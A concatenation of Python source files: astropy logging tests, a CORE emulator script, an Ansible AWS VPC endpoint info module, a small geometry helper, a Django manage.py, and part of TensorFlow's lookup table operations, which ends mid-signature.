with log.log_to_file(log_path, filter_level='ERROR'):
log.error("Error message")
log.warning("Warning message")
log_file.close()
log_file = local_path.open('rb')
log_entries = log_file.readlines()
log_file.close()
assert len(log_entries) == 1
assert eval(log_entries[0].strip())[-2:] == (
'ERROR', 'Error message')
def test_log_to_file_origin1(tmpdir):
local_path = tmpdir.join('test.log')
log_file = local_path.open('wb')
log_path = str(local_path.realpath())
with log.log_to_file(log_path, filter_origin='astropy.tests'):
log.error("Error message")
log.warning("Warning message")
log_file.close()
log_file = local_path.open('rb')
log_entries = log_file.readlines()
log_file.close()
assert len(log_entries) == 2
def test_log_to_file_origin2(tmpdir):
local_path = tmpdir.join('test.log')
log_file = local_path.open('wb')
log_path = str(local_path.realpath())
with log.log_to_file(log_path, filter_origin='astropy.wcs'):
log.error("Error message")
log.warning("Warning message")
log_file.close()
log_file = local_path.open('rb')
log_entries = log_file.readlines()
log_file.close()
assert len(log_entries) == 0
@pytest.mark.parametrize(('encoding'), ['', 'utf-8', 'cp1252'])
def test_log_to_file_encoding(tmpdir, encoding):
local_path = tmpdir.join('test.log')
log_path = str(local_path.realpath())
orig_encoding = conf.log_file_encoding
conf.log_file_encoding = encoding
with log.log_to_file(log_path):
for handler in log.handlers:
if isinstance(handler, logging.FileHandler):
if encoding:
assert handler.stream.encoding == encoding
else:
assert handler.stream.encoding == locale.getpreferredencoding()
conf.log_file_encoding = orig_encoding
|
py | b41520d8929bd5926428e94b280143f7304f1e7d | import logging
from core.emulator.coreemu import CoreEmu
from core.emulator.data import IpPrefixes, NodeOptions
from core.emulator.enumerations import EventTypes
from core.nodes.base import CoreNode
from core.nodes.lxd import LxcNode
if __name__ == "__main__":
logging.basicConfig(level=logging.DEBUG)
coreemu = CoreEmu()
session = coreemu.create_session()
session.set_state(EventTypes.CONFIGURATION_STATE)
try:
prefixes = IpPrefixes(ip4_prefix="10.83.0.0/16")
options = NodeOptions(image="ubuntu")
# create node one
node1 = session.add_node(LxcNode, options=options)
interface1_data = prefixes.create_iface(node1)
# create node two
node2 = session.add_node(CoreNode)
interface2_data = prefixes.create_iface(node2)
# add link
session.add_link(node1.id, node2.id, interface1_data, interface2_data)
# instantiate
session.instantiate()
finally:
input("continue to shutdown")
coreemu.shutdown()
|
py | b4152128ddef4535973f6bfed29ffbc059610290 | #!/usr/bin/python
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = r'''
module: ec2_vpc_endpoint_info
short_description: Retrieves AWS VPC endpoints details using AWS methods.
version_added: 1.0.0
description:
- Gets various details related to AWS VPC endpoints.
options:
query:
description:
- Defaults to C(endpoints).
- Specifies the query action to take.
- I(query=endpoints) returns information about AWS VPC endpoints.
- Retrieving information about services using I(query=services) has been
deprecated in favour of the M(amazon.aws.ec2_vpc_endpoint_service_info) module.
- The I(query) option has been deprecated and will be removed after 2022-12-01.
required: False
choices:
- services
- endpoints
type: str
vpc_endpoint_ids:
description:
- The IDs of specific endpoints to retrieve the details of.
type: list
elements: str
filters:
description:
- A dict of filters to apply. Each dict item consists of a filter key and a filter value.
See U(https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeVpcEndpoints.html)
for possible filters.
type: dict
author: Karen Cheng (@Etherdaemon)
extends_documentation_fragment:
- amazon.aws.aws
- amazon.aws.ec2
'''
EXAMPLES = r'''
# Simple example of listing all support AWS services for VPC endpoints
- name: List supported AWS endpoint services
amazon.aws.ec2_vpc_endpoint_info:
query: services
region: ap-southeast-2
register: supported_endpoint_services
- name: Get all endpoints in ap-southeast-2 region
amazon.aws.ec2_vpc_endpoint_info:
query: endpoints
region: ap-southeast-2
register: existing_endpoints
- name: Get all endpoints with specific filters
amazon.aws.ec2_vpc_endpoint_info:
query: endpoints
region: ap-southeast-2
filters:
vpc-id:
- vpc-12345678
- vpc-87654321
vpc-endpoint-state:
- available
- pending
register: existing_endpoints
- name: Get details on specific endpoint
amazon.aws.ec2_vpc_endpoint_info:
query: endpoints
region: ap-southeast-2
vpc_endpoint_ids:
- vpce-12345678
register: endpoint_details
'''
RETURN = r'''
service_names:
description: AWS VPC endpoint service names
returned: I(query) is C(services)
type: list
sample:
service_names:
- com.amazonaws.ap-southeast-2.s3
vpc_endpoints:
description:
- A list of endpoints that match the query. Each endpoint has the keys creation_timestamp,
policy_document, route_table_ids, service_name, state, vpc_endpoint_id, vpc_id.
returned: I(query) is C(endpoints)
type: list
sample:
vpc_endpoints:
- creation_timestamp: "2017-02-16T11:06:48+00:00"
policy_document: >
"{\"Version\":\"2012-10-17\",\"Id\":\"Policy1450910922815\",
\"Statement\":[{\"Sid\":\"Stmt1450910920641\",\"Effect\":\"Allow\",
\"Principal\":\"*\",\"Action\":\"s3:*\",\"Resource\":[\"arn:aws:s3:::*/*\",\"arn:aws:s3:::*\"]}]}"
route_table_ids:
- rtb-abcd1234
service_name: "com.amazonaws.ap-southeast-2.s3"
state: "available"
vpc_endpoint_id: "vpce-abbad0d0"
vpc_id: "vpc-1111ffff"
'''
try:
import botocore
except ImportError:
pass # Handled by AnsibleAWSModule
from ansible.module_utils.common.dict_transformations import camel_dict_to_snake_dict
from ansible_collections.amazon.aws.plugins.module_utils.core import AnsibleAWSModule
from ansible_collections.amazon.aws.plugins.module_utils.core import is_boto3_error_code
from ansible_collections.amazon.aws.plugins.module_utils.core import normalize_boto3_result
from ansible_collections.amazon.aws.plugins.module_utils.ec2 import AWSRetry
from ansible_collections.amazon.aws.plugins.module_utils.ec2 import ansible_dict_to_boto3_filter_list
@AWSRetry.jittered_backoff()
def _describe_endpoints(client, **params):
paginator = client.get_paginator('describe_vpc_endpoints')
return paginator.paginate(**params).build_full_result()
@AWSRetry.jittered_backoff()
def _describe_endpoint_services(client, **params):
paginator = client.get_paginator('describe_vpc_endpoint_services')
return paginator.paginate(**params).build_full_result()
def get_supported_services(client, module):
try:
services = _describe_endpoint_services(client)
except (botocore.exceptions.BotoCoreError, botocore.exceptions.ClientError) as e:
module.fail_json_aws(e, msg="Failed to get endpoint servicess")
results = list(services['ServiceNames'])
return dict(service_names=results)
def get_endpoints(client, module):
results = list()
params = dict()
params['Filters'] = ansible_dict_to_boto3_filter_list(module.params.get('filters'))
if module.params.get('vpc_endpoint_ids'):
params['VpcEndpointIds'] = module.params.get('vpc_endpoint_ids')
try:
results = _describe_endpoints(client, **params)['VpcEndpoints']
results = normalize_boto3_result(results)
except is_boto3_error_code('InvalidVpcEndpointId.NotFound'):
module.exit_json(msg='VpcEndpoint {0} does not exist'.format(module.params.get('vpc_endpoint_ids')), vpc_endpoints=[])
except (botocore.exceptions.BotoCoreError, botocore.exceptions.ClientError) as e: # pylint: disable=duplicate-except
module.fail_json_aws(e, msg="Failed to get endpoints")
return dict(vpc_endpoints=[camel_dict_to_snake_dict(result) for result in results])
def main():
argument_spec = dict(
query=dict(choices=['services', 'endpoints'], required=False),
filters=dict(default={}, type='dict'),
vpc_endpoint_ids=dict(type='list', elements='str'),
)
module = AnsibleAWSModule(argument_spec=argument_spec, supports_check_mode=True)
# Validate Requirements
try:
connection = module.client('ec2')
except (botocore.exceptions.ClientError, botocore.exceptions.BotoCoreError) as e:
module.fail_json_aws(e, msg='Failed to connect to AWS')
query = module.params.get('query')
if query == 'endpoints':
module.deprecate('The query option has been deprecated and'
' will be removed after 2022-12-01. Searching for'
' `endpoints` is now the default and after'
' 2022-12-01 this module will only support fetching'
' endpoints.',
date='2022-12-01', collection_name='amazon.aws')
elif query == 'services':
module.deprecate('Support for fetching service information with this '
'module has been deprecated and will be removed after'
' 2022-12-01. '
'Please use the ec2_vpc_endpoint_service_info module '
'instead.', date='2022-12-01',
collection_name='amazon.aws')
else:
query = 'endpoints'
invocations = {
'services': get_supported_services,
'endpoints': get_endpoints,
}
results = invocations[query](connection, module)
module.exit_json(**results)
if __name__ == '__main__':
main()
|
py | b415228c2b3d730c6fd2d08d0aae93c71e0bfe57 | import math
from typing import Tuple
def polar2cartesian(radius: float, angle: float, center: Tuple[float, float] = (0, 0)) -> Tuple[float, float]:
x0, y0 = center
return x0 + radius * math.cos(angle), y0 + radius * math.sin(angle) |
py | b41522c7d680ffa22ce1abb4d60ce92406c904ec | #!/usr/bin/env python
import os
import sys
if __name__ == '__main__':
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'config.settings.local')
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
py | b415235b994c01ac7b0e5c9950aa7a8a16b525dd | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Lookup table operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import functools
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import gen_lookup_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.training.saver import BaseSaverBuilder
from tensorflow.python.util import compat
from tensorflow.python.util.deprecation import deprecated
class LookupInterface(object):
"""Represent a lookup table that persists across different steps."""
def __init__(self, key_dtype, value_dtype, name):
"""Construct a lookup table interface.
Args:
key_dtype: The table key type.
value_dtype: The table value type.
name: A name for the operation (optional).
"""
self._key_dtype = dtypes.as_dtype(key_dtype)
self._value_dtype = dtypes.as_dtype(value_dtype)
self._name = name
@property
def key_dtype(self):
"""The table key dtype."""
return self._key_dtype
@property
def value_dtype(self):
"""The table value dtype."""
return self._value_dtype
@property
def name(self):
"""The name of the table."""
return self._name
@property
def init(self):
"""The table initialization op."""
raise NotImplementedError
def size(self, name=None):
"""Compute the number of elements in this table."""
raise NotImplementedError
def lookup(self, keys, name=None):
"""Looks up `keys` in a table, outputs the corresponding values."""
raise NotImplementedError
def check_table_dtypes(self, key_dtype, value_dtype):
"""Check that the given key_dtype and value_dtype matches the table dtypes.
Args:
key_dtype: The key data type to check.
value_dtype: The value data type to check.
Raises:
TypeError: when 'key_dtype' or 'value_dtype' doesn't match the table data
types.
"""
if key_dtype != self.key_dtype:
raise TypeError("Invalid key dtype, expected %s but got %s." %
(self.key_dtype, key_dtype))
if value_dtype != self.value_dtype:
raise TypeError("Invalid value dtype, expected %s but got %s." %
(self.value_dtype, value_dtype))
class InitializableLookupTableBase(LookupInterface):
"""Initializable lookup table interface.
An initializable lookup tables persist across different steps.
"""
def __init__(self, table_ref, default_value, initializer):
"""Construct a table object from a table reference.
    It requires a table initializer object (subclass of `TableInitializerBase`).
It provides the table key and value types, as well as the op to initialize
the table. The caller is responsible to execute the initialization op.
Args:
table_ref: The table reference, i.e. the output of the lookup table ops.
default_value: The value to use if a key is missing in the table.
initializer: The table initializer to use.
"""
super(InitializableLookupTableBase, self).__init__(
initializer.key_dtype, initializer.value_dtype,
table_ref.op.name.split("/")[-1])
self._table_ref = table_ref
self._default_value = ops.convert_to_tensor(default_value,
dtype=self._value_dtype)
self._default_value.get_shape().merge_with(tensor_shape.scalar())
self._init = initializer.initialize(self)
@property
def table_ref(self):
"""Get the underlying table reference."""
return self._table_ref
@property
def default_value(self):
"""The default value of the table."""
return self._default_value
@property
def init(self):
"""The table initialization op."""
return self._init
def size(self, name=None):
"""Compute the number of elements in this table.
Args:
name: A name for the operation (optional).
Returns:
A scalar tensor containing the number of elements in this table.
"""
with ops.name_scope(name, "%s_Size" % self._name,
[self._table_ref]) as scope:
# pylint: disable=protected-access
return gen_lookup_ops._lookup_table_size(self._table_ref, name=scope)
# pylint: enable=protected-access
def lookup(self, keys, name=None):
"""Looks up `keys` in a table, outputs the corresponding values.
The `default_value` is used for keys not present in the table.
Args:
keys: Keys to look up. May be either a `SparseTensor` or dense `Tensor`.
name: A name for the operation (optional).
Returns:
A `SparseTensor` if keys are sparse, otherwise a dense `Tensor`.
Raises:
TypeError: when `keys` or `default_value` doesn't match the table data
types.
"""
key_tensor = keys
if isinstance(keys, sparse_tensor.SparseTensor):
key_tensor = keys.values
if keys.dtype != self._key_dtype:
raise TypeError("Signature mismatch. Keys must be dtype %s, got %s." %
(self._key_dtype, keys.dtype))
with ops.name_scope(
name, "%s_Lookup" % self._name,
(self._table_ref, key_tensor, self._default_value)) as scope:
# pylint: disable=protected-access
values = gen_lookup_ops._lookup_table_find(
self._table_ref, key_tensor, self._default_value, name=scope)
# pylint: enable=protected-access
values.set_shape(key_tensor.get_shape())
if isinstance(keys, sparse_tensor.SparseTensor):
return sparse_tensor.SparseTensor(keys.indices, values, keys.dense_shape)
else:
return values
class HashTable(InitializableLookupTableBase):
"""A generic hash table implementation.
Example usage:
```python
table = tf.contrib.lookup.HashTable(
tf.contrib.lookup.KeyValueTensorInitializer(keys, values), -1)
out = table.lookup(input_tensor).
table.init.run()
print out.eval()
```
"""
def __init__(self, initializer, default_value, shared_name=None, name=None):
"""Creates a non-initialized `HashTable` object.
Creates a table, the type of its keys and values are specified by the
initializer.
Before using the table you will have to initialize it. After initialization
the table will be immutable.
Args:
initializer: The table initializer to use. See `HashTable` kernel for
supported key and value types.
default_value: The value to use if a key is missing in the table.
shared_name: If non-empty, this table will be shared under
the given name across multiple sessions.
name: A name for the operation (optional).
Returns:
A `HashTable` object.
"""
with ops.name_scope(
name, "hash_table", (initializer, default_value)) as scope:
# pylint: disable=protected-access
table_ref = gen_lookup_ops._hash_table(
shared_name=shared_name,
key_dtype=initializer.key_dtype,
value_dtype=initializer.value_dtype,
name=scope)
# pylint: enable=protected-access
super(HashTable, self).__init__(table_ref, default_value, initializer)
class TableInitializerBase(object):
"""Base class for lookup table initializers."""
def __init__(self, key_dtype, value_dtype):
"""Construct a table initializer object.
Args:
key_dtype: Type of the table keys.
value_dtype: Type of the table values.
"""
self._key_dtype = dtypes.as_dtype(key_dtype)
self._value_dtype = dtypes.as_dtype(value_dtype)
@property
def key_dtype(self):
"""The expected table key dtype."""
return self._key_dtype
@property
def value_dtype(self):
"""The expected table value dtype."""
return self._value_dtype
def initialize(self, table):
"""Returns the table initialization op."""
raise NotImplementedError
class KeyValueTensorInitializer(TableInitializerBase):
"""Table initializers given `keys` and `values` tensors."""
def __init__(self, keys, values, key_dtype=None, value_dtype=None, name=None):
"""Constructs a table initializer object based on keys and values tensors.
Args:
keys: The tensor for the keys.
values: The tensor for the values.
key_dtype: The `keys` data type. Used when `keys` is a python array.
value_dtype: The `values` data type. Used when `values` is a python array.
name: A name for the operation (optional).
"""
with ops.name_scope(name, "key_value_init", [keys, values]) as scope:
self._keys = ops.convert_to_tensor(keys, dtype=key_dtype, name="keys")
self._values = ops.convert_to_tensor(values,
dtype=value_dtype,
name="values")
self._name = scope
super(KeyValueTensorInitializer, self).__init__(self._keys.dtype,
self._values.dtype)
def initialize(self, table):
"""Initializes the given `table` with `keys` and `values` tensors.
Args:
table: The table to initialize.
Returns:
The operation that initializes the table.
Raises:
TypeError: when the keys and values data types do not match the table
key and value data types.
"""
table.check_table_dtypes(self._keys.dtype, self._values.dtype)
with ops.name_scope(
self._name,
values=(table.table_ref, self._keys, self._values)) as scope:
# pylint: disable=protected-access
init_op = gen_lookup_ops._initialize_table(
table.table_ref, self._keys, self._values, name=scope)
# pylint: enable=protected-access
ops.add_to_collection(ops.GraphKeys.TABLE_INITIALIZERS, init_op)
return init_op
class TextFileIndex(object):
WHOLE_LINE = -2
LINE_NUMBER = -1
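# (Added note) TextFileIndex.WHOLE_LINE (-2) and TextFileIndex.LINE_NUMBER (-1) are the
# sentinel column indices referred to throughout the initializer docstrings below.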
class TextFileInitializer(TableInitializerBase):
"""Table initializers from a text file.
This initializer assigns one entry in the table for each line in the file.
The key and value type of the table to initialize is given by `key_dtype` and
`value_dtype`.
The key and value content to get from each line is specified by
the `key_index` and `value_index`.
* `TextFileIndex.LINE_NUMBER` means use the line number starting from zero,
expects data type int64.
* `TextFileIndex.WHOLE_LINE` means use the whole line content, expects data
type string.
* A value `>=0` means use the index (starting at zero) of the split line based
on `delimiter`.
For example if we have a file with the following content:
```
emerson 10
lake 20
palmer 30
```
The following snippet initializes a table with the first column as keys and
second column as values:
* `emerson -> 10`
* `lake -> 20`
* `palmer -> 30`
```python
table = tf.contrib.lookup.HashTable(tf.contrib.lookup.TextFileInitializer(
"test.txt", tf.string, 0, tf.int64, 1, delimiter=" "), -1)
...
table.init.run()
```
Similarly to initialize the whole line as keys and the line number as values.
* `emerson 10 -> 0`
* `lake 20 -> 1`
* `palmer 30 -> 2`
```python
table = tf.contrib.lookup.HashTable(tf.contrib.lookup.TextFileInitializer(
"test.txt", tf.string, tf.contrib.lookup.TextFileIndex.WHOLE_LINE,
tf.int64, tf.contrib.lookup.TextFileIndex.LINE_NUMBER, delimiter=" "), -1)
...
table.init.run()
```
"""
def __init__(self,
filename,
key_dtype,
key_index,
value_dtype,
value_index,
vocab_size=None,
delimiter="\t",
name=None):
"""Constructs a table initializer object to populate from a text file.
It generates one key-value pair per line. The type of table key and
value are specified by `key_dtype` and `value_dtype`, respectively.
Similarly the content of the key and value are specified by the key_index
and value_index.
- TextFileIndex.LINE_NUMBER means use the line number starting from zero,
expects data type int64.
- TextFileIndex.WHOLE_LINE means use the whole line content, expects data
type string.
- A value >=0 means use the index (starting at zero) of the split line based
on `delimiter`.
Args:
filename: The filename of the text file to be used for initialization.
The path must be accessible from wherever the graph is initialized
(eg. trainer or eval workers). The filename may be a scalar `Tensor`.
key_dtype: The `key` data type.
key_index: the index that represents information of a line to get the
table 'key' values from.
value_dtype: The `value` data type.
value_index: the index that represents information of a line to get the
        table 'value' values from.
vocab_size: The number of elements in the file, if known.
delimiter: The delimiter to separate fields in a line.
name: A name for the operation (optional).
Raises:
ValueError: when the filename is empty, or when the table key and value
data types do not match the expected data types.
"""
if not isinstance(filename, ops.Tensor) and not filename:
raise ValueError("Filename required for %s." % name)
key_dtype = dtypes.as_dtype(key_dtype)
value_dtype = dtypes.as_dtype(value_dtype)
if key_index < -2:
raise ValueError("Invalid key index %s." % (key_index))
if key_index == TextFileIndex.LINE_NUMBER and key_dtype != dtypes.int64:
raise ValueError("Signature mismatch. Keys must be dtype %s, got %s." %
(dtypes.int64, key_dtype))
if ((key_index == TextFileIndex.WHOLE_LINE) and
(not key_dtype.is_integer) and (key_dtype != dtypes.string)):
raise ValueError(
"Signature mismatch. Keys must be integer or string, got %s." %
key_dtype)
if value_index < -2:
raise ValueError("Invalid value index %s." % (value_index))
if value_index == TextFileIndex.LINE_NUMBER and value_dtype != dtypes.int64:
raise ValueError("Signature mismatch. Values must be dtype %s, got %s." %
(dtypes.int64, value_dtype))
if value_index == TextFileIndex.WHOLE_LINE and value_dtype != dtypes.string:
raise ValueError("Signature mismatch. Values must be dtype %s, got %s." %
(dtypes.string, value_dtype))
if (vocab_size is not None) and (vocab_size <= 0):
raise ValueError("Invalid vocab_size %s." % vocab_size)
self._filename = filename
self._key_index = key_index
self._value_index = value_index
self._vocab_size = vocab_size
self._delimiter = delimiter
self._name = name
super(TextFileInitializer, self).__init__(key_dtype, value_dtype)
def initialize(self, table):
"""Initializes the table from a text file.
Args:
table: The table to be initialized.
Returns:
The operation that initializes the table.
Raises:
TypeError: when the keys and values data types do not match the table
key and value data types.
"""
table.check_table_dtypes(self.key_dtype, self.value_dtype)
with ops.name_scope(
self._name, "text_file_init", (table.table_ref,)) as scope:
filename = ops.convert_to_tensor(self._filename,
dtypes.string,
name="asset_filepath")
# pylint: disable=protected-access
init_op = gen_lookup_ops._initialize_table_from_text_file(
table.table_ref,
filename,
self._key_index,
self._value_index,
-1 if self._vocab_size is None else self._vocab_size,
self._delimiter,
name=scope)
# pylint: enable=protected-access
ops.add_to_collection(ops.GraphKeys.TABLE_INITIALIZERS, init_op)
ops.add_to_collection(ops.GraphKeys.ASSET_FILEPATHS, filename)
return init_op
class TextFileStringTableInitializer(TextFileInitializer):
"""Table initializer for `int64` IDs to string tables from a text file."""
def __init__(self,
filename,
key_column_index=TextFileIndex.LINE_NUMBER,
value_column_index=TextFileIndex.WHOLE_LINE,
vocab_size=None,
delimiter="\t",
name="text_file_string_table_init"):
"""Constructs an initializer for an id-to-string table from a text file.
It populates a table that its key and value types are int64 and string,
respectively. It generates one key-value pair per line.
The content of the key and value are specified by `key_column_index`
and `value_column_index`.
- TextFileIndex.LINE_NUMBER means use the line number starting from zero,
expects data type int64.
- TextFileIndex.WHOLE_LINE means use the whole line content, expects data
type string.
- A value >=0 means use the index (starting at zero) of the split line based
on `delimiter`.
Args:
filename: The filename of the text file to be used for initialization.
The path must be accessible from wherever the graph is initialized
(eg. trainer or eval workers). The filename may be a scalar `Tensor`.
key_column_index: The column index from the text file to get the keys
from. The default is 0 that represents the whole line content.
value_column_index: The column index from the text file to get the
values from. The default is to use the line number, starting from zero.
vocab_size: The number of elements in the file, if known.
delimiter: The delimiter to separate fields in a line.
name: Optional name for the op.
Raises:
TypeError: when the filename is empty, or when the table key and value
data types do not match the expected data types.
"""
super(TextFileStringTableInitializer, self).__init__(filename,
dtypes.int64,
key_column_index,
dtypes.string,
value_column_index,
vocab_size=vocab_size,
delimiter=delimiter,
name=name)
class TextFileIdTableInitializer(TextFileInitializer):
"""Table initializer for string to `int64` IDs tables from a text file."""
def __init__(self,
filename,
key_column_index=TextFileIndex.WHOLE_LINE,
value_column_index=TextFileIndex.LINE_NUMBER,
vocab_size=None,
delimiter="\t",
name="text_file_id_table_init",
key_dtype=dtypes.string):
"""Constructs an initializer for an string-to-id table from a text file.
It populates a table that its key and value types are string and int64,
respectively. It generates one key-value pair per line.
The content of the key and value are specified by the key_index
and value_index.
- TextFileIndex.LINE_NUMBER means use the line number starting from zero,
expects data type int64.
- TextFileIndex.WHOLE_LINE means use the whole line content, expects data
type string.
- A value >=0 means use the index (starting at zero) of the split line based
on `delimiter`.
Args:
filename: The filename of the text file to be used for initialization.
The path must be accessible from wherever the graph is initialized
(eg. trainer or eval workers). The filename may be a scalar `Tensor`.
key_column_index: The column index from the text file to get the `key`
values from. The default is to use the line number, starting from zero.
      value_column_index: The column index from the text file to get the `value`
values from. The default is 0 that represents the whole line content.
vocab_size: The number of elements in the file, if known.
delimiter: The delimiter to separate fields in a line.
name: Optional name for the op.
key_dtype: The `key` data type.
Raises:
TypeError: when the filename is empty, or when the table key and value
data types do not match the expected data types.
"""
super(TextFileIdTableInitializer, self).__init__(filename,
key_dtype,
key_column_index,
dtypes.int64,
value_column_index,
vocab_size=vocab_size,
delimiter=delimiter,
name=name)
class HasherSpec(collections.namedtuple("HasherSpec", ["hasher", "key"])):
"""A structure for the spec of the hashing function to use for hash buckets.
`hasher` is the name of the hashing function to use (eg. "fasthash",
"stronghash").
`key` is optional and specify the key to use for the hash function if
supported, currently only used by a strong hash.
Fields:
hasher: The hasher name to use.
key: The key to be used by the hashing function, if required.
"""
__slots__ = ()
FastHashSpec = HasherSpec("fasthash", None) # pylint: disable=invalid-name
class StrongHashSpec(HasherSpec):
"""A structure to specify a key of the strong keyed hash spec.
The strong hash requires a `key`, which is a list of 2 unsigned integer
numbers. These should be non-zero; random numbers generated from random.org
would be a fine choice.
Fields:
key: The key to be used by the keyed hashing function.
"""
__slots__ = ()
def __new__(cls, key):
if len(key) != 2:
raise ValueError("key must have size 2, got %s." % len(key))
if not isinstance(key[0], compat.integral_types) or not isinstance(
key[1], compat.integral_types):
raise TypeError("Invalid key %s. Must be unsigned integer values." % key)
return super(cls, StrongHashSpec).__new__(cls, "stronghash", key)
def _as_string(tensor):
if dtypes.string == tensor.dtype.base_dtype:
return tensor
return string_ops.as_string(tensor)
class IdTableWithHashBuckets(LookupInterface):
"""String to Id table wrapper that assigns out-of-vocabulary keys to buckets.
For example, if an instance of `IdTableWithHashBuckets` is initialized with a
string-to-id table that maps:
- emerson -> 0
- lake -> 1
- palmer -> 2
  The `IdTableWithHashBuckets` object will perform the following mapping:
- emerson -> 0
- lake -> 1
- palmer -> 2
- <other term> -> bucket id between 3 and 3 + num_oov_buckets, calculated by:
hash(<term>) % num_oov_buckets + vocab_size
If input_tensor is ["emerson", "lake", "palmer", "king", "crimson"],
the lookup result is [0, 1, 2, 4, 7]
If `table` is None, only out-of-vocabulary buckets are used.
Example usage:
```python
num_oov_buckets = 3
input_tensor = tf.constant(["emerson", "lake", "palmer", "king", "crimnson"])
table = tf.IdTableWithHashBuckets(
tf.HashTable(tf.TextFileIdTableInitializer(filename), default_value),
num_oov_buckets)
out = table.lookup(input_tensor).
table.init.run()
print out.eval()
```
The hash function used for generating out-of-vocabulary buckets ID is handled
by `hasher_spec`.
"""
def __init__(self,
table,
num_oov_buckets,
hasher_spec=FastHashSpec,
name=None,
key_dtype=None):
"""Construct a `IdTableWithHashBuckets` object.
Args:
table: Table that maps `tf.string` or `tf.int64` keys to `tf.int64` ids.
num_oov_buckets: Number of buckets to use for out-of-vocabulary keys.
hasher_spec: A `HasherSpec` to specify the hash function to use for
        assignment of out-of-vocabulary buckets (optional).
name: A name for the operation (optional).
key_dtype: Data type of keys passed to `lookup`. Defaults to
`table.key_dtype` if `table` is specified, otherwise `tf.string`.
Must be string or integer, and must be castable to `table.key_dtype`.
Raises:
ValueError: when `table` in None and `num_oov_buckets` is not positive.
TypeError: when `hasher_spec` is invalid.
"""
# If a name ends with a '/' it is a "name scope", remove all trailing '/'
# characters to use as table name.
if name:
name = name.rstrip("/")
if table:
if key_dtype is None:
key_dtype = table.key_dtype
supported_table_key_dtypes = (dtypes.int64, dtypes.string)
if table.key_dtype not in supported_table_key_dtypes:
raise TypeError("Invalid key dtype, expected one of %s, but got %s." %
(supported_table_key_dtypes, key_dtype))
if table.key_dtype.is_integer != key_dtype.is_integer:
raise TypeError("Invalid key dtype, expected %s but got %s." %
("integer" if key_dtype.is_integer else "non-integer",
table.key_dtype))
if table.value_dtype != dtypes.int64:
raise TypeError("Invalid value dtype, expected %s but got %s." %
(dtypes.int64, table.value_dtype))
self._table = table
name = name or self._table.name
else:
if num_oov_buckets <= 0:
raise ValueError("oov_buckets must be > 0 if no table is supplied.")
key_dtype = dtypes.string if key_dtype is None else key_dtype
self._table = None
name = name or "hash_bucket"
if (not key_dtype.is_integer) and (dtypes.string != key_dtype):
raise TypeError(
"Invalid key_dtype, expected integer or string, got %s." % key_dtype)
self._num_oov_buckets = num_oov_buckets
if not isinstance(hasher_spec, HasherSpec):
raise TypeError("hasher_spec must be of type HasherSpec, got %s" %
hasher_spec)
self._hasher_spec = hasher_spec
super(IdTableWithHashBuckets, self).__init__(key_dtype, dtypes.int64,
name.split("/")[-1])
@property
def init(self):
"""The table initialization op."""
if self._table:
return self._table.init
with ops.name_scope(None, "init"):
return control_flow_ops.no_op()
def size(self, name=None):
"""Compute the number of elements in this table."""
with ops.name_scope(name, "%s_Size" % self.name) as scope:
if self._table:
tsize = self._table.size(scope)
else:
tsize = ops.convert_to_tensor(0, dtype=dtypes.int64)
return tsize + self._num_oov_buckets
def _get_string_to_hash_bucket_fn(self, hasher_spec):
"""Returns the string_to_hash_bucket op to use based on `hasher_spec`."""
if not isinstance(hasher_spec, HasherSpec):
raise TypeError("hasher_spec must be of type HasherSpec %s" % hasher_spec)
if hasher_spec.hasher == "fasthash":
return string_ops.string_to_hash_bucket_fast
if hasher_spec.hasher == "legacy":
return string_ops.string_to_hash_bucket
if hasher_spec.hasher == "stronghash":
return functools.partial(
string_ops.string_to_hash_bucket_strong, key=hasher_spec.key)
raise ValueError("Unknown hasher %s" % hasher_spec.hasher)
def lookup(self, keys, name=None):
"""Looks up `keys` in the table, outputs the corresponding values.
It assigns out-of-vocabulary keys to buckets based in their hashes.
Args:
keys: Keys to look up. May be either a `SparseTensor` or dense `Tensor`.
name: Optional name for the op.
Returns:
A `SparseTensor` if keys are sparse, otherwise a dense `Tensor`.
Raises:
TypeError: when `keys` doesn't match the table key data type.
"""
if keys.dtype != self._key_dtype:
raise TypeError("Signature mismatch. Keys must be dtype %s, got %s." %
(self._key_dtype, keys.dtype))
values = keys
if isinstance(keys, sparse_tensor.SparseTensor):
values = keys.values
if self._table and (self._table.key_dtype.base_dtype == dtypes.int64):
values = math_ops.to_int64(values)
if self._num_oov_buckets == 0:
ids = self._table.lookup(values, name=name)
else:
# TODO(yleon): Consider moving this functionality to its own kernel.
with ops.name_scope(name, "%s_Lookup" % self.name) as scope:
str_to_hash_bucket = self._get_string_to_hash_bucket_fn(
self._hasher_spec)
buckets = str_to_hash_bucket(
_as_string(values),
num_buckets=self._num_oov_buckets,
name="hash_bucket")
if self._table:
ids = self._table.lookup(values)
buckets = math_ops.add(buckets, self._table.size())
is_id_non_default = math_ops.not_equal(ids, self._table.default_value)
ids = array_ops.where(is_id_non_default, ids, buckets, name=scope)
else:
ids = buckets
if isinstance(keys, sparse_tensor.SparseTensor):
return sparse_tensor.SparseTensor(keys.indices, ids, keys.dense_shape)
return ids
@deprecated("2017-04-10", "Use `index_table_from_file`.")
def string_to_index_table_from_file(vocabulary_file=None,
num_oov_buckets=0,
vocab_size=None,
default_value=-1,
hasher_spec=FastHashSpec,
name=None):
return index_table_from_file(
vocabulary_file, num_oov_buckets, vocab_size, default_value, hasher_spec,
key_dtype=dtypes.string, name=name)
def index_table_from_file(vocabulary_file=None,
num_oov_buckets=0,
vocab_size=None,
default_value=-1,
hasher_spec=FastHashSpec,
key_dtype=dtypes.string,
